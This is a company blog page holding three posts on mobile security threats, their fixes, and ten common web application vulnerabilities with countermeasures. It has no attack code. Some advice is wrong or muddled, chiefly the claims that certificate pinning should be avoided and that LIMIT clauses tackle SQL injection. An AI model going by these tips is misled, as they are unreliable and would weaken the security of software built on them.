AlignMinds Technologies logo

SINCE 2009

Founded over 13 years ago, we’ve grown from a small team in Kochi, India, to a leading global technology consulting company that transformed businesses by our design led product engineering.

info@alignminds.com
+1 850 999 7458 | +91 484 485 4333

Tag: Security Threats

Posted on

Most Dangerous Mobile Security Threats of 2020

Smartphones are widely used across the world today, hence the security threats are also widely spread. Our phones have become the most connected devices, at the same time the least secure. The security threats we face are those which we fail to notice and will be more hazardous in the near future. Let us look at some of the major security threats that every mobile user must be aware of.

Cryptojacking

Cryptojacking is defined as the secret use of your smartphone device by the attacker to mine cryptocurrency.

Cryptojacking used to be confined to the victim unknowingly installing a program that secretly mines cryptocurrency.

When using browser there is no need of a separate program to do the In-browser crypto-jacking.

  • The threat actor compromises a website
  • The crypto mining script executes when the user connects to the compromised website.
  • Users unknowingly start mining cryptocurrency on behalf of the threat actor
  • When successfully adding a new block to the blockchain, the threat actor receives a reward in cryptocurrency coins.

      • Insecure communications

      The networks that you use to communicate are never fully foolproof, making your device vulnerable to attacks from malware. There are chances that hackers tend to set-up fake access points when you access Wi-Fi in public places such as coffee shops, airports, etc. The access points are named using nonexclusive names, which can fool even the most brilliant people.

      It is always good to be cautious when connecting to public Wi-Fi. Use public Wi-Fi only if extremely required and never use it to access personal information like bank account access etc.

      Mobile ransomware

      A form of ransomware which affects only mobile devices is called mobile ransomware.

      A cybercriminal uses mobile malware to steal sensitive data from smartphones or attempts to lock a device, before demanding payment to return the data to the user or to unlock the blocked device. Sometimes people may find some innocent content or some software through social networks, which they download accidentally and get tricked into downloading some malicious ransomware.

      After the malware is downloaded onto a device, it will ask the user to pay an amount before encrypting files and locking the phone. After the payment is processed online, often via Bitcoin, the ransomware will send a code to unlock the phone or data.

      While installing any app, make sure the app is downloaded from Google Play or App Store than from any third-party app stores.

      Phishing attacks

      A social engineering attack often used to steal user data, including login credentials and credit card numbers is called Phishing.

      It occurs when an attacker fools the victim into opening an email, instant message, or text message by acting as a trusted entity.

      User can play smart by not clicking any unfamiliar email links. Always enter URLs manually as much as possible.

      SMS–based attacks

      From the email world, the phishing has evolved into the SMS world. You get SMS texts and links that you are asked to open to authenticate certain information. To any novice user, the links and the sender would seem genuine. However, clicking on these links can make your device vulnerable to the attacks, and in turn, give away your confidential information. This is a developing security threat for your mobile device.

      Botnets attack

      A botnet is just a short form for the terms “robot” and “network”.

      A botnet is a number of web-connected devices, each of which is running one or more bots. Botnets can be used to perform distributed refusing of service attack (DDoS attack), send spam, steal data, and allows the attacker to access the device and its connection.

      A botnet attack firstly requires creating numerous botnets or a botnet army. Once the attack is initiated, these botnets are used to send network/Internet-based requests to the target system in a large quantity. These requests can be in the form of bulk email messages to simple ping messages. The attack can slow down the network/server, making it busy or unable for others to access it or temporarily freeze the server.

      Distributed denial of service (DDOS) is a common example of a botnet attack that utilizes a number of botnet devices to send a large number of simultaneous requests/packets to the targeted system.

      Installing effective antivirus/anti-malware software can protect your device from such attacks.

      User & device authentication

      Most mailing apps have provided the user & device authentication, which has allowed the user to store passwords, and their data on the devices. If the device is stolen, your authentication and the data will be at risk. This is one of the major threats to mobile devices, as they contain our valuable personal pieces of information.

      The smartphone is a device that blurs the boundaries between professional and personal life and the users are up to three times more likely to be the victims of mobile threats. Safe browsing, identifying suspicious files or phishing emails, ensuring safe data access at public Wi-Fi networks, safe downloads are some of the important tips that a user must be careful about. Other than these security measures, several mobile security software is available to download from Google Play and App Store to ensure safety in your mobile devices.

      Understanding these common security threats and implementing recommended solutions can help you protect data in your smartphone.

Posted on

Solutions: Most Dangerous Mobile Security Threats of 2020

Prevention of mobile security threats helps organizations and individuals to protect their devices, apps, users and content from malicious attacks. Security teams can prevent these threats by using an app that scans devices and configurations within the network, or by setting up security protocols in case malware is present on the network.

1. Cryptojacking attacks

Check these steps to minimize the risk of your organization falling into a trap

Install an ad-blocking or anti-crypto mining extension on web browsers.

Since crypto jacking scripts are often delivered through web ads, installing an ad blocker can be an effective means of stopping them. Using ad blockers like the Ad Blocker Plus can easily detect crypto mining scripts. Experts recommend extensions like No Coin and MinerBlock, which are designed to detect and block crypto mining scripts.

Keep your web filtering tools up to date.

If you identify a web page that is delivering crypto jacking scripts, make sure your users are blocked from accessing it again.

Maintain browser extensions.

Browser extensions are meant to make our tasks simpler. But, some of them could be a trap set by an attacker to execute crypto mining scripts.

Use mobile device management (MDM) solution to better control users’ devices.

Bring-your-own-device (BYOD) policies for preventing illicit crypto mining. An MDM solution can help to manage apps and extensions on users’ devices. MDM solutions tend to be geared toward larger enterprises, and smaller companies that often can’t afford them. However, experts note that mobile devices are not as at risk as desktop computers and servers. Because they tend to have less processing power, they do not produce a great deal of profit for hackers.

2. Insecure communications

Here is a list of few best practices to be used for Android phones which may bring down risks related to insecure communication.

Understand that the network layer is highly capable of eavesdropping, thus making it insecure.

  • It is important to apply SSL/TLS to transport channels used by the mobile app to transmit sensitive pieces of information, session tokens, or other sensitive data to a backend API or web service.
  • When an application runs a routine via the browser/WebKit, using outside entities for third-party analytics companies and social networks could be more secure. Mixed SSL sessions should be avoided as they could expose the user’s session ID.
  • Always use a strong, standard cipher suites with suitable key lengths.
  • Use certificates signed by a trusted CA provider.
  • Do not pin certificate for security conscious applications and never allow using self-signed certificates.
  • Always require SSL (Secure Socket Layer) chain verification.
  • Always establish a secure connection with trusted certificates from keychain after verifying the identity of the endpoint server.
  • Build a UI that alerts users when a mobile app detects an invalid certificate.
  • Avoid sending sensitive data over alternate channels (e.g, SMS, MMS, or notifications).
  • Apply a separate layer of encryption to any sensitive data before it is given to the SSL channel. In the event of a possible vulnerability in the SSL implementation, the encrypted data will provide a secondary defence against confidentiality violation.

3. Mobile ransomware

  • Only install applications from authorized stores like Google Play or AppStore. To be sure that no application makes its way onto your device from an untrusted source, go to Android settings, choose Security, and make sure that the “Unknown Sources” box is not checked.
  • Regularly check updates for your installed applications and your device OS. You can choose to update all installed apps automatically. It’s better to do update the system to the latest version as soon as an over-the-air (OTA) update arrives.
  • Install a strong security solution. Downloading apps from only the official stores and updating them regularly alone will not promise maximum security. Malware can lurk into even Google Play and, can also spread by means of exploit kits using yet-unknown vulnerabilities.

4. Phishing attacks

  • Think Before You Click!
  • Keep Your Browser Up to Date
  • Keep Informed About Phishing Techniques
  • Check Your Online Accounts Regularly
  • Use Firewalls

5. SMS–based attacks

  • Think before you click a link from SMS
  • Do not open spam messages
  • Keep informed about phishing techniques

6. Botnets attack

To avoid system compromises, it is advised to use only licensed and genuine software. Keep your mobile updated with latest security patches. Install anti-malware solution and update it regularly. Disable Autoplay /Autorun for removable drives.

Always protect your device from Trojans and other threats by using effective anti-malware software.

7. User & device authentication

  • Think before allowing store passwords, and your data in mailing apps and browsers

Remember there is no single fool-proof way to avoid mobile security threats.

– Habeeb Rahman

References

Posted on

Top 10 Vulnerabilities in Web Applications and How to Tackle Them

Before we begin with the vulnerabilities in web applications, it is good to know there are several open communities like OWASP that are always looking out for vulnerabilities and are dedicated to resolving these vulnerabilities. Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain web applications and APIs that can be trusted.

Now let us check the top 10 vulnerabilities in web applications and how to tackle these vulnerabilities.

1. Cross-Site Scripting (XSS)

It is a very common application-layer web attack. XSS targets scripts embedded in webpages that are executed on the client side (i.e., the scripts run on the user’s web browser). XSS is a threat for client-side scripting languages like HTML & JavaScript. It works by controlling the client side to work as desired by the attacker. Such an attack may, for example, use a script to run every time page reloads or on any other events.

XSS is mainly used for tampering and stealing user sensitive data. XSS usually targets the user and not the application.

We can prevent XSS by separating untrusted data from active browser content. We can also use frameworks like React JS or Ruby on Rails that automatically escape XSS by design.

2. SQL Injection

It’s an application security weakness that allows the attackers to alter the data in the database or just read confidential data such as a password. The vulnerability occurs when we enter untrusted data to the database from web forms or when it is part of a SQL query.

Web applications use SQL query to communicate with the database. SQL injections occur when the application fails to validate the data in a SQL query (from web forms) and hence, an attacker can trick the database to execute unexpected commands.

Using LIMIT and other SQL controls within queries are a way of tackling injections.

3. LDAP Injection

This is similar to SQL injection. Here also, the attacker place codes in user input fields to gain unlimited access. It may lead to information theft, browser or session hijacking, defacement of the website or even other problems.

LDAP (Lightweight Directory Access Protocol) injections work by inserting harmful codes to client provided data in LDAP statements. If a web application does not properly validate the input fields, attackers can construct LDAP statements which execute with user permission. Such queries can modify or delete anything in the LDAP tree and cause disastrous results.

To handle these injections, it is advised to use safe API, that avoids interpreter entirely and provides a parameterized interface, migrates to use Object Relational Mapping Tools (ORMs).

4. Cross-Site Request Forgery (CSRF)

Usually, a website sends an application a request that a user is authenticated from another website. An attacker can use this to access data and functionalities of the web application as the browser is already authenticated using the user’s credentials. Attackers may use XSS to defeat CSRF defence the application might employ. So, avoiding XSS will prevent these types of attack to some extent.

5. Insecure cryptographic storage

It occurs when sensitive data is not stored securely. Make sure all sensitive data are encrypted while storing & secured key management must be adopted.

Use a good encryption algorithm.

Make sure you do not use cryptography of your own since you can never predict whether it is secure or not. Do not ship or deploy with any default credentials, particularly for admin users.

6. Broken Authentication

Broken authentication happens when application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.

Practice implementing multi-factor authentication for web applications to prevent automated, credential stuffing, brute force, and stolen credential re-use attacks.

7. Sensitive Data Exposure

Many web applications and APIs do not properly protect sensitive data such as financial, healthcare, and PII (Personally Identifiable Information). Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection such as encryption at rest or in transit and requires special precautions when exchanged between browser and server.

We can prevent such situations by applying controls as per classification. Classify data stored processed and transmitted by an application.

Don’t store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS compliant tokenization or even truncation. Remember, data that is not retained cannot be stolen.

8. XML External Entities (XXE)

Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.

Points to keep in mind are, whenever possible, use less complex data formats such as JSON and avoid serialization of sensitive data.

Also, patch or upgrade all XML processors and libraries in use by web applications or on the underlying operating system. Use dependency checkers. Update SOAP to SOAP 1.2 or higher.

9. Broken Access Control

Restrictions on the privileges of authenticated users are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.

The possible solution to overcome this problem is to implement access control mechanisms once and reuse them throughout the application. Also, Minimize the use of CORS.

10. Security Misconfiguration

Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only all operating systems, frameworks, libraries, and applications should be securely configured but also, they must be patched and upgraded in a timely fashion.

We can avoid this by checking none of the default accounts credentials is the same.

The aim of this article is to give a good insight into common flaws that can lead to modern data breaches and could make web applications vulnerable to various attacks.

As the saying goes “Prevention is better than cure”, proactive and defensive security steps must be adopted beforehand than making it a practice only after a security breach.

Bharath Varma